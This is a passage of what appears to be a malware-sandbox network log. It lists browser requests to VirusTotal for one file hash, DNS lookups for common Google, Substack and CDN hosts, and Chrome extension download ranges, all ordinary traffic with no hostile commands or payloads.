                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/votes?relationships=item%2Cvoter
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/votes?relationships=item%2Cvoter HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      x-tool: vt-ui-main
                                                                                                                                                                      accept: application/json
                                                                                                                                                                      x-app-version: v1x143x1
                                                                                                                                                                      x-vt-anti-abuse-header: MTIyOTMwOTU1MjUtWkc5dWRDQmlaU0JsZG1scy0xNjczMjcyMjI2LjQ4Mg==
                                                                                                                                                                      accept-ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      content-type: application/json
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/comments?relationships=item%2Cauthor
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/comments?relationships=item%2Cauthor HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      x-tool: vt-ui-main
                                                                                                                                                                      accept: application/json
                                                                                                                                                                      x-app-version: v1x143x1
                                                                                                                                                                      x-vt-anti-abuse-header: MTM3MjU3NjI3MTEtWkc5dWRDQmlaU0JsZG1scy0xNjczMjcyMjI2LjQ4Mw==
                                                                                                                                                                      accept-ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      content-type: application/json
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/references?limit=10
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/references?limit=10 HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      x-tool: vt-ui-main
                                                                                                                                                                      accept: application/json
                                                                                                                                                                      x-app-version: v1x143x1
                                                                                                                                                                      x-vt-anti-abuse-header: MTUwNTI1ODA3MDYtWkc5dWRDQmlaU0JsZG1scy0xNjczMjcyMjI2LjQ4Ng==
                                                                                                                                                                      accept-ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      content-type: application/json
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/related_references?limit=10
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/related_references?limit=10 HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      x-tool: vt-ui-main
                                                                                                                                                                      accept: application/json
                                                                                                                                                                      x-app-version: v1x143x1
                                                                                                                                                                      x-vt-anti-abuse-header: MTg4MTUxNjM2NzAtWkc5dWRDQmlaU0JsZG1scy0xNjczMjcyMjI2LjQ4Nw==
                                                                                                                                                                      accept-ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      content-type: application/json
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/graphs?relationships=owner%2Cviewers%2Ceditors
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/graphs?relationships=owner%2Cviewers%2Ceditors HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      x-tool: vt-ui-main
                                                                                                                                                                      accept: application/json
                                                                                                                                                                      x-app-version: v1x143x1
                                                                                                                                                                      x-vt-anti-abuse-header: MTYzMjMxMDk1NzMtWkc5dWRDQmlaU0JsZG1scy0xNjczMjcyMjI2LjQ5Ng==
                                                                                                                                                                      accept-ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      content-type: application/json
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: _ga=GA1.2.659001374.1673272215
                                                                                                                                                                      cookie: _gid=GA1.2.855122885.1673272215
                                                                                                                                                                      cookie: _gat=1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.recaptcha.net/recaptcha/api.js?render=explicit
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      142.250.179.163:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /recaptcha/api.js?render=explicit HTTP/2.0
                                                                                                                                                                      host: www.recaptcha.net
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/manifest.json
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/manifest.json HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      www.virustotal.com
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      www.virustotal.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      www.virustotal.com
                                                                                                                                                                      IN CNAME
                                                                                                                                                                      ghs-svc-https-c46.ghs-ssl.googlehosted.com
                                                                                                                                                                      ghs-svc-https-c46.ghs-ssl.googlehosted.com
                                                                                                                                                                      IN A
                                                                                                                                                                      74.125.34.46
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      lh5.googleusercontent.com
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      lh5.googleusercontent.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      lh5.googleusercontent.com
                                                                                                                                                                      IN CNAME
                                                                                                                                                                      googlehosted.l.googleusercontent.com
                                                                                                                                                                      googlehosted.l.googleusercontent.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.251.36.1
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      encrypted-tbn0.gstatic.com
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      encrypted-tbn0.gstatic.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      encrypted-tbn0.gstatic.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.251.36.14
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      id.google.com
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      id.google.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      id.google.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.251.36.3
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      i.ytimg.com
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      i.ytimg.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      i.ytimg.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.251.39.118
                                                                                                                                                                      i.ytimg.com
                                                                                                                                                                      IN A
                                                                                                                                                                      172.217.168.214
                                                                                                                                                                      i.ytimg.com
                                                                                                                                                                      IN A
                                                                                                                                                                      216.58.208.118
                                                                                                                                                                      i.ytimg.com
                                                                                                                                                                      IN A
                                                                                                                                                                      216.58.214.22
                                                                                                                                                                      i.ytimg.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.250.179.150
                                                                                                                                                                      i.ytimg.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.251.36.54
                                                                                                                                                                      i.ytimg.com
                                                                                                                                                                      IN A
                                                                                                                                                                      172.217.168.246
                                                                                                                                                                      i.ytimg.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.250.179.182
                                                                                                                                                                      i.ytimg.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.250.179.214
                                                                                                                                                                      i.ytimg.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.251.36.22
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      play.google.com
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      play.google.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      play.google.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.251.36.14
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      malpedia.caad.fkie.fraunhofer.de
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      malpedia.caad.fkie.fraunhofer.de
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      malpedia.caad.fkie.fraunhofer.de
                                                                                                                                                                      IN A
                                                                                                                                                                      129.233.182.56
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      malpedia.caad.fkie.fraunhofer.de
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      malpedia.caad.fkie.fraunhofer.de
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      malpedia.caad.fkie.fraunhofer.de
                                                                                                                                                                      IN A
                                                                                                                                                                      129.233.182.56
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      googleads.g.doubleclick.net
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      googleads.g.doubleclick.net
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      googleads.g.doubleclick.net
                                                                                                                                                                      IN A
                                                                                                                                                                      142.250.179.162
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      googleads.g.doubleclick.net
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      googleads.g.doubleclick.net
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      googleads.g.doubleclick.net
                                                                                                                                                                      IN A
                                                                                                                                                                      142.250.179.162
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      static.doubleclick.net
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      static.doubleclick.net
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      static.doubleclick.net
                                                                                                                                                                      IN A
                                                                                                                                                                      142.251.36.6
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.250.179.170
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.250.179.202
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.251.36.10
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.251.39.106
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      172.217.168.202
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      216.58.214.10
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.250.179.138
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.251.36.42
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.251.36.10
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.251.39.106
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      172.217.168.202
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      216.58.208.106
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      216.58.214.10
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.250.179.138
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.251.36.42
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.250.179.170
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.250.179.202
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      content-autofill.googleapis.com
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      content-autofill.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      content-autofill.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.251.36.42
                                                                                                                                                                      content-autofill.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      172.217.168.234
                                                                                                                                                                      content-autofill.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.250.179.170
                                                                                                                                                                      content-autofill.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.250.179.202
                                                                                                                                                                      content-autofill.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.251.36.10
                                                                                                                                                                      content-autofill.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.251.39.106
                                                                                                                                                                      content-autofill.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      172.217.168.202
                                                                                                                                                                      content-autofill.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      216.58.208.106
                                                                                                                                                                      content-autofill.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      216.58.214.10
                                                                                                                                                                      content-autofill.googleapis.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.250.179.138
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      malwarology.substack.com
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      malwarology.substack.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      malwarology.substack.com
                                                                                                                                                                      IN A
                                                                                                                                                                      104.18.33.245
                                                                                                                                                                      malwarology.substack.com
                                                                                                                                                                      IN A
                                                                                                                                                                      172.64.154.11
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      malwarology.substack.com
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      malwarology.substack.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      malwarology.substack.com
                                                                                                                                                                      IN A
                                                                                                                                                                      104.18.33.245
                                                                                                                                                                      malwarology.substack.com
                                                                                                                                                                      IN A
                                                                                                                                                                      172.64.154.11
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      substackcdn.com
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      substackcdn.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      substackcdn.com
                                                                                                                                                                      IN A
                                                                                                                                                                      65.9.86.11
                                                                                                                                                                      substackcdn.com
                                                                                                                                                                      IN A
                                                                                                                                                                      65.9.86.66
                                                                                                                                                                      substackcdn.com
                                                                                                                                                                      IN A
                                                                                                                                                                      65.9.86.107
                                                                                                                                                                      substackcdn.com
                                                                                                                                                                      IN A
                                                                                                                                                                      65.9.86.91
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      substackcdn.com
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      substackcdn.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      substackcdn.com
                                                                                                                                                                      IN A
                                                                                                                                                                      65.9.86.66
                                                                                                                                                                      substackcdn.com
                                                                                                                                                                      IN A
                                                                                                                                                                      65.9.86.11
                                                                                                                                                                      substackcdn.com
                                                                                                                                                                      IN A
                                                                                                                                                                      65.9.86.91
                                                                                                                                                                      substackcdn.com
                                                                                                                                                                      IN A
                                                                                                                                                                      65.9.86.107
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      js.sentry-cdn.com
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      js.sentry-cdn.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      js.sentry-cdn.com
                                                                                                                                                                      IN A
                                                                                                                                                                      151.101.66.217
                                                                                                                                                                      js.sentry-cdn.com
                                                                                                                                                                      IN A
                                                                                                                                                                      151.101.130.217
                                                                                                                                                                      js.sentry-cdn.com
                                                                                                                                                                      IN A
                                                                                                                                                                      151.101.194.217
                                                                                                                                                                      js.sentry-cdn.com
                                                                                                                                                                      IN A
                                                                                                                                                                      151.101.2.217
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com
                                                                                                                                                                      IN CNAME
                                                                                                                                                                      s3-1-w.amazonaws.com
                                                                                                                                                                      s3-1-w.amazonaws.com
                                                                                                                                                                      IN CNAME
                                                                                                                                                                      s3-w.us-east-1.amazonaws.com
                                                                                                                                                                      s3-w.us-east-1.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      52.217.44.212
                                                                                                                                                                      s3-w.us-east-1.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      52.216.170.123
                                                                                                                                                                      s3-w.us-east-1.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      52.216.241.68
                                                                                                                                                                      s3-w.us-east-1.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      3.5.3.165
                                                                                                                                                                      s3-w.us-east-1.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      52.216.92.83
                                                                                                                                                                      s3-w.us-east-1.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      54.231.200.169
                                                                                                                                                                      s3-w.us-east-1.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      52.217.199.57
                                                                                                                                                                      s3-w.us-east-1.amazonaws.com
                                                                                                                                                                      IN A
                                                                                                                                                                      52.216.40.241
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                      Remote address:
                                                                                                                                                                      34.104.35.123:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                      If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      Range: bytes=519079-865214
                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                      Host: edgedl.me.gvt1.com
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 206 Partial Content
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      content-disposition: attachment
                                                                                                                                                                      content-security-policy: default-src 'none'
                                                                                                                                                                      server: Google-Edge-Cache
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                      x-xss-protection: 0
                                                                                                                                                                      content-length: 346136
                                                                                                                                                                      x-request-id: e6821ba8-0bfc-47c6-9292-d46acc8cca0f
                                                                                                                                                                      date: Mon, 09 Jan 2023 00:27:55 GMT
                                                                                                                                                                      age: 44589
                                                                                                                                                                      last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      etag: "2e2fe7"
                                                                                                                                                                      content-type: application/x-chrome-extension
                                                                                                                                                                      content-range: bytes 519079-865214/6760942
                                                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                      cache-control: public,max-age=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                      Remote address:
                                                                                                                                                                      34.104.35.123:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                      If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      Range: bytes=865215-1540716
                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                      Host: edgedl.me.gvt1.com
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 206 Partial Content
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      content-disposition: attachment
                                                                                                                                                                      content-security-policy: default-src 'none'
